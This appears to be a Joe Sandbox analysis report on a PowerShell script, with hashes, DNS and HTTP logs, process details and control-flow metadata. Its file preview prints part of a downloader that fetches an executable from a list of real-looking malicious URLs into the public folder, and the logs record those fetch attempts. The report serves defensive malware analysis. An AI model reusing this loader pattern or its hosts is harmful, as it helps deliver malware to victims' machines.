                                                    SHA-512:C55F3388A871011BB41C6D430A4C24BC67520012080ADCB1FF7094FEBFFFCD2778E08166B12245A9DD177E7FF0B2CB81861B62CE8C1FE6C24EBBEEE937BE3319
                                                    Malicious:false
                                                    File type:ASCII text, with very long lines (64682), with CRLF, LF line terminators
                                                    Entropy (8bit):5.710245148695879
                                                    TrID:
                                                      File name:ps1006.ps1
                                                      File size:801'939 bytes
                                                      MD5:c538cd6483e9cf1510943d965f890777
                                                      SHA1:4dd880286916a54f6b0b3ed74e85135d1b2fc032
                                                      SHA256:8d09f0aa9a5d675e1f28dd31f6c982d33924c58d7b9b873d5cc90f3ddea5b491
                                                      SHA512:a13b2df4a31a587d54f1b5ae9d0d0aa2d89bf9562632b40730c741273811fb769003a8e6740035ef2dbf2740273f1a8b46d882b59983fa5dd885926d29e5976e
                                                      SSDEEP:12288:8ppYXT60Mv5a8kebcetZ3Aq74GA19Td1JplTmu5jP+D/43EeI1gZEtd14Q2fb5C:fXWZ5Pbcq92zjP+sjI10+r4Q2D5C
                                                      TLSH:52053311862C9E5E07FC4BB8845E1F4E12F8CEC86884ECFAC298785F5E6DF35458A25C
                                                      File Content Preview:$qzi=new-object net.webclient;$mrs='http://habarimoto24.com/nh@http://fenett2018.com/dobgx@http://eastend.jp/bl5kfa@http://bemnyc.com/u8erijeq@http://abakus-biuro.net//a9zqemm'.split('@');$wai = '509';$kqz=$env:public+'\'+$wai+'.exe';foreach($cme in $mrs)
                                                      Icon Hash:3270d6baae77db44
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Nov 22, 2024 09:22:04.551093102 CET | 49730 | 80 | 192.168.2.4 | 162.43.104.133
                                                      Nov 22, 2024 09:22:04.670778036 CET | 80 | 49730 | 162.43.104.133 | 192.168.2.4
                                                      Nov 22, 2024 09:22:04.670875072 CET | 49730 | 80 | 192.168.2.4 | 162.43.104.133
                                                      Nov 22, 2024 09:22:04.671799898 CET | 49730 | 80 | 192.168.2.4 | 162.43.104.133
                                                      Nov 22, 2024 09:22:04.791465044 CET | 80 | 49730 | 162.43.104.133 | 192.168.2.4
                                                      Nov 22, 2024 09:22:06.148067951 CET | 80 | 49730 | 162.43.104.133 | 192.168.2.4
                                                      Nov 22, 2024 09:22:06.148089886 CET | 80 | 49730 | 162.43.104.133 | 192.168.2.4
                                                      Nov 22, 2024 09:22:06.148103952 CET | 80 | 49730 | 162.43.104.133 | 192.168.2.4
                                                      Nov 22, 2024 09:22:06.148139954 CET | 49730 | 80 | 192.168.2.4 | 162.43.104.133
                                                      Nov 22, 2024 09:22:06.190156937 CET | 49730 | 80 | 192.168.2.4 | 162.43.104.133
                                                      Nov 22, 2024 09:22:06.457102060 CET | 49731 | 80 | 192.168.2.4 | 198.185.159.145
                                                      Nov 22, 2024 09:22:06.576704025 CET | 80 | 49731 | 198.185.159.145 | 192.168.2.4
                                                      Nov 22, 2024 09:22:06.579634905 CET | 49731 | 80 | 192.168.2.4 | 198.185.159.145
                                                      Nov 22, 2024 09:22:06.579734087 CET | 49731 | 80 | 192.168.2.4 | 198.185.159.145
                                                      Nov 22, 2024 09:22:06.699389935 CET | 80 | 49731 | 198.185.159.145 | 192.168.2.4
                                                      Nov 22, 2024 09:22:07.668378115 CET | 80 | 49731 | 198.185.159.145 | 192.168.2.4
                                                      Nov 22, 2024 09:22:07.668411970 CET | 80 | 49731 | 198.185.159.145 | 192.168.2.4
                                                      Nov 22, 2024 09:22:07.668472052 CET | 49731 | 80 | 192.168.2.4 | 198.185.159.145
                                                      Nov 22, 2024 09:22:12.684015989 CET | 49730 | 80 | 192.168.2.4 | 162.43.104.133
                                                      Nov 22, 2024 09:22:12.684180975 CET | 49731 | 80 | 192.168.2.4 | 198.185.159.145
                                                      Nov 22, 2024 09:22:12.804295063 CET | 80 | 49730 | 162.43.104.133 | 192.168.2.4
                                                      Nov 22, 2024 09:22:12.804389954 CET | 49730 | 80 | 192.168.2.4 | 162.43.104.133
                                                      Nov 22, 2024 09:22:12.804577112 CET | 80 | 49731 | 198.185.159.145 | 192.168.2.4
                                                      Nov 22, 2024 09:22:12.804651976 CET | 49731 | 80 | 192.168.2.4 | 198.185.159.145
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Nov 22, 2024 09:22:03.103416920 CET | 52622 | 53 | 192.168.2.4 | 1.1.1.1
                                                      Nov 22, 2024 09:22:03.762976885 CET | 53 | 52622 | 1.1.1.1 | 192.168.2.4
                                                      Nov 22, 2024 09:22:03.805911064 CET | 59609 | 53 | 192.168.2.4 | 1.1.1.1
                                                      Nov 22, 2024 09:22:03.946887016 CET | 53 | 59609 | 1.1.1.1 | 192.168.2.4
                                                      Nov 22, 2024 09:22:03.948726892 CET | 65174 | 53 | 192.168.2.4 | 1.1.1.1
                                                      Nov 22, 2024 09:22:04.424060106 CET | 53 | 65174 | 1.1.1.1 | 192.168.2.4
                                                      Nov 22, 2024 09:22:06.228205919 CET | 51372 | 53 | 192.168.2.4 | 1.1.1.1
                                                      Nov 22, 2024 09:22:06.455375910 CET | 53 | 51372 | 1.1.1.1 | 192.168.2.4
                                                      Nov 22, 2024 09:22:07.670380116 CET | 51743 | 53 | 192.168.2.4 | 1.1.1.1
                                                      Nov 22, 2024 09:22:07.808626890 CET | 53 | 51743 | 1.1.1.1 | 192.168.2.4
                                                      Nov 22, 2024 09:22:12.684087038 CET | 51893 | 53 | 192.168.2.4 | 1.1.1.1
                                                      Nov 22, 2024 09:22:12.822269917 CET | 53 | 51893 | 1.1.1.1 | 192.168.2.4
                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                      Nov 22, 2024 09:22:03.103416920 CET | 192.168.2.4 | 1.1.1.1 | 0x208a | Standard query (0) | habarimoto24.com | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:03.805911064 CET | 192.168.2.4 | 1.1.1.1 | 0x1285 | Standard query (0) | fenett2018.com | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:03.948726892 CET | 192.168.2.4 | 1.1.1.1 | 0x8f48 | Standard query (0) | eastend.jp | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:06.228205919 CET | 192.168.2.4 | 1.1.1.1 | 0x36b3 | Standard query (0) | bemnyc.com | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:07.670380116 CET | 192.168.2.4 | 1.1.1.1 | 0x3c97 | Standard query (0) | abakus-biuro.net | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:12.684087038 CET | 192.168.2.4 | 1.1.1.1 | 0x9957 | Standard query (0) | yourmother4cancer.info | A (IP address) | IN (0x0001) | false
                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                      Nov 22, 2024 09:22:03.762976885 CET | 1.1.1.1 | 192.168.2.4 | 0x208a | Server failure (2) | habarimoto24.com | none | none | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:03.946887016 CET | 1.1.1.1 | 192.168.2.4 | 0x1285 | Name error (3) | fenett2018.com | none | none | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:04.424060106 CET | 1.1.1.1 | 192.168.2.4 | 0x8f48 | No error (0) | eastend.jp | | 162.43.104.133 | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:06.455375910 CET | 1.1.1.1 | 192.168.2.4 | 0x36b3 | No error (0) | bemnyc.com | | 198.185.159.145 | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:06.455375910 CET | 1.1.1.1 | 192.168.2.4 | 0x36b3 | No error (0) | bemnyc.com | | 198.49.23.144 | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:06.455375910 CET | 1.1.1.1 | 192.168.2.4 | 0x36b3 | No error (0) | bemnyc.com | | 198.49.23.145 | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:06.455375910 CET | 1.1.1.1 | 192.168.2.4 | 0x36b3 | No error (0) | bemnyc.com | | 198.185.159.144 | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:07.808626890 CET | 1.1.1.1 | 192.168.2.4 | 0x3c97 | Name error (3) | abakus-biuro.net | none | none | A (IP address) | IN (0x0001) | false
                                                      Nov 22, 2024 09:22:12.822269917 CET | 1.1.1.1 | 192.168.2.4 | 0x9957 | Name error (3) | yourmother4cancer.info | none | none | A (IP address) | IN (0x0001) | false
                                                      • eastend.jp
                                                      • bemnyc.com
                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.4 | 49730 | 162.43.104.133 | 80 | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Nov 22, 2024 09:22:04.671799898 CET | 66 | OUT | GET /bl5kfa HTTP/1.1
                                                      Host: eastend.jp
                                                      Connection: Keep-Alive
                                                      Nov 22, 2024 09:22:06.148067951 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 22 Nov 2024 08:22:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 2814
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 25 Jul 2023 10:28:06 GMT
                                                      ETag: "afe-6014d2fcf5ab8"
                                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14
                                                      Nov 22, 2024 09:22:06.148089886 CET | 1236 | IN
                                                      Data Ascii: px; margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                      Nov 22, 2024 09:22:06.148103952 CET | 587 | IN
                                                      Data Ascii: dy><div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.4 | 49731 | 198.185.159.145 | 80 | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Nov 22, 2024 09:22:06.579734087 CET | 68 | OUT | GET /u8erijeq HTTP/1.1
                                                      Host: bemnyc.com
                                                      Connection: Keep-Alive
                                                      Nov 22, 2024 09:22:07.668378115 CET | 1236 | IN | HTTP/1.1 400 Bad Request
                                                      Cache-Control: no-cache, must-revalidate
                                                      Content-Length: 2061
                                                      Content-Type: text/html; charset=UTF-8
                                                      Date: Fri, 22 Nov 2024 08:22:07 UTC
                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                      Pragma: no-cache
                                                      Server: Squarespace
                                                      X-Contextid: 4P3g8DW8/Zf0233kZ
                                                      Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span {
                                                      Nov 22, 2024 09:22:07.668411970 CET | 1105 | IN
                                                      Data Ascii: margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "



                                                      Target ID:0
                                                      Start time:03:21:58
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:03:21:58
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:03:22:11
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"
                                                      Imagebase:0x7ff6e9160000
                                                      File size:2'759'232 bytes
                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:03:22:11
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP"
                                                      Imagebase:0x7ff7b0eb0000
                                                      File size:52'744 bytes
                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                        Execution Graph

                                                        Execution Coverage:2.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:18
                                                        Total number of Limit Nodes:1

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2812582608.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h__H
                                                        • API String ID: 0-4245872964
                                                        • Opcode ID: 84c9a14386d8547c556690142bb26bcba7c2270d05d91080fd2655cc2827b3c0
                                                        • Instruction ID: 19881969a709bb2558c82ed734fed588cfb3140a5c45cc4960fcc0b99d76c57a
                                                        • Opcode Fuzzy Hash: 84c9a14386d8547c556690142bb26bcba7c2270d05d91080fd2655cc2827b3c0
                                                        • Instruction Fuzzy Hash: BBF1C330618A8D8FEB78DF58DC5A7E937D1FB59314F01422AD84DC7291DF35AA818B81

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered graph not preserved; basic-block edge list reduced to its recoverable data): function entry at 7ffd9b87c45d, basic blocks spanning 7ffd9b87c42e-7ffd9b87c9c2, with a CreateProcessA API call in block 7ffd9b87c707-7ffd9b87c80d and internal calls to 7ffd9b87c8bd and 7ffd9b8706b0.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2812582608.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: h__H
                                                        • API String ID: 963392458-4245872964
                                                        • Opcode ID: 430a5d7a23892675b44626daa6c06872e2b572070e66655afd5501bfcfb309a7
                                                        • Instruction ID: a9c8d5a6c2618a555e6ad9037fac8754b37e17c218030d6e13abbf9bff6331bf
                                                        • Opcode Fuzzy Hash: 430a5d7a23892675b44626daa6c06872e2b572070e66655afd5501bfcfb309a7
                                                        • Instruction Fuzzy Hash: E2E1D430618A8D4FDB69DF18CC9A7E53BE1FF59310F05426AD84DC7291DF74AA418B82

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered graph not preserved; basic-block edge list reduced to its recoverable data): function entry at 7ffd9b9416ad, basic blocks spanning 7ffd9b9416ad-7ffd9b941b00; no API calls or internal calls appear in the edge list.
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2813401301.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b940000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60f90a73f9c2cb65a855566e400858b8ff82f2a07d697dfbd21661c46954e38e
                                                        • Instruction ID: 96c9ca4c07184d890d90ab7a47b7085cd04135073f5ec709f8ae40f4e9d213e8
                                                        • Opcode Fuzzy Hash: 60f90a73f9c2cb65a855566e400858b8ff82f2a07d697dfbd21661c46954e38e
                                                        • Instruction Fuzzy Hash: A2E13822B1FBEA1FE76A976858715B43FE2EF42214B0A01FBD099C71F3D9185D458342

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered graph not preserved; basic-block edge list reduced to its recoverable data): function entry at 7ffd9b944435, basic blocks spanning 7ffd9b944435-7ffd9b9447eb; no API calls or internal calls appear in the edge list.
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2813401301.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b940000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 312b5095b6c09f0adbcc07c64232cc9986ccadec01a4d6e587c45257e686186a
                                                        • Instruction ID: e58c04596aaeec3c868d3f393db9ceafbec40d5e8fa2083fc6af2a7160d03392
                                                        • Opcode Fuzzy Hash: 312b5095b6c09f0adbcc07c64232cc9986ccadec01a4d6e587c45257e686186a
                                                        • Instruction Fuzzy Hash: BBD16831B1FA9E1FEB659BA848656B97BD2EF11314F0900FED45CCB1E3DD18A9018341

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2813401301.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b940000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b7db6e240d0dd03a4ce50df76703fb42b339e61220a5cd4a888374936339aee
                                                        • Instruction ID: a7038b0115fdd488bcbe035a81d2ff4c91f858180edfa0d063f69444ef5aa546
                                                        • Opcode Fuzzy Hash: 5b7db6e240d0dd03a4ce50df76703fb42b339e61220a5cd4a888374936339aee
                                                        • Instruction Fuzzy Hash: F221D922F2FA7E1BF3B9976854611746BC3DF94258B5A00BED45DC72E3ED29AC054301

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered graph not preserved; basic-block edge list reduced to its recoverable data): function entry at 7ffd9b875f78, basic blocks spanning 7ffd9b875f78-7ffd9b8765d1, ending in a self-looping block 7ffd9b8765b1-7ffd9b8765d1; no API calls or internal calls appear in the edge list.
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2812582608.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O_I$O_I
                                                        • API String ID: 0-150625707
                                                        • Opcode ID: c72bd7ce3ba7a326ea53db63477430c8cacbb8e58a0868743bc0eeb8bb64fd9f
                                                        • Instruction ID: 4078676d52fb6c07188fb05b862b36a9e4723689ef65fd8e33c7acb5170bc1a4
                                                        • Opcode Fuzzy Hash: c72bd7ce3ba7a326ea53db63477430c8cacbb8e58a0868743bc0eeb8bb64fd9f
                                                        • Instruction Fuzzy Hash: E5123DC7F0F9920BE36557EC78691E81B91EFC526870941F7D198CB0EBBC046D4AA2D1